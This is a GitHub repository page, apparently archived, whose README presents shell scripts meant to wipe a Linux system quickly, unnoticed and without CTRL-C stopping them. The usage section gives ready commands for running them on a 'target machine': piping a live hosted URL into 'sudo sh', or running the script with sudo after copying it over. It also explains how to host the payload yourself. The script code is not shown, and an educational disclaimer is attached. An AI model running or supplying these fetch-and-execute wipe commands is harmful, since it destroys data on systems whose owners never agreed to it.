Skip to content
This repository has been archived by the owner on Mar 17, 2024. It is now read-only.
/ curl-sh-wipe-my-pc Public archive

Example on how `curl {URL} | sudo sh` can wipe your system (using 2 unique ways :D)

License

Notifications You must be signed in to change notification settings

TDiblik/curl-sh-wipe-my-pc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Why?

I was wondering whether I could do a whole lot of damage in a short span of time after gaining access to a linux server, that could go unnoticed and be unstoppable using CTRL-C. As it turns out, I could, wanna see it in action? (CZ only)

Usage

You can either:

  • Host it on your own (see Deployment ) and then execute curl {YOUR_URL} | sudo sh on the target machine.
  • Execute curl https://curl-sh-wipe-my-pc.tomasdiblik.cz/ | sudo sh OR curl https://curl-sh-wipe-my-pc.tomasdiblik.cz/basic.sh | sudo sh on the target machine (if I see ANY usage for illegal purposes, I'm taking it down. Use in educational environments only please.)
  • Just copy these scripts onto your target, and run chmod +x advanced.sh && sudo ./advanced.sh lol

Deployment

  1. Configure your server (I use nginx, so you can use the nginx-config provided), this step depends a lot on you tho ... If you're unable to do this, you probably also lack the knowledge required to understand the commands executed and I would advise you against hosting these scripts on your own.
    • If you're on windows: dos2unix.exe advanced.sh basic.sh
    • and then: scp -P {SSH_PORT} basic.sh advanced.sh LICENSE {USER}@{SERVER_IP}:{FULL_PATH_EXAMPLE_/www/curl-sh-wipe-my-pc}
  2. Go onto your target system and type curl {YOUR_URL} | sudo sh

Legal notice:

The code provided is for educational purposes only and should not be used for any malicious or illegal activities. Any unauthorized use of this code is strictly prohibited and violators will be held liable for their actions. The code is intended to be used solely for the purpose of learning and understanding vulnerabilities and should not be executed on any systems without proper authorization and oversight. The author of this code takes no responsibility for any actions taken by any party using this code and is not liable for any damages or harm caused as a result of its use.

About

Example on how `curl {URL} | sudo sh` can wipe your system (using 2 unique ways :D)

Topics

Resources

License

Stars

Watchers

Forks

Languages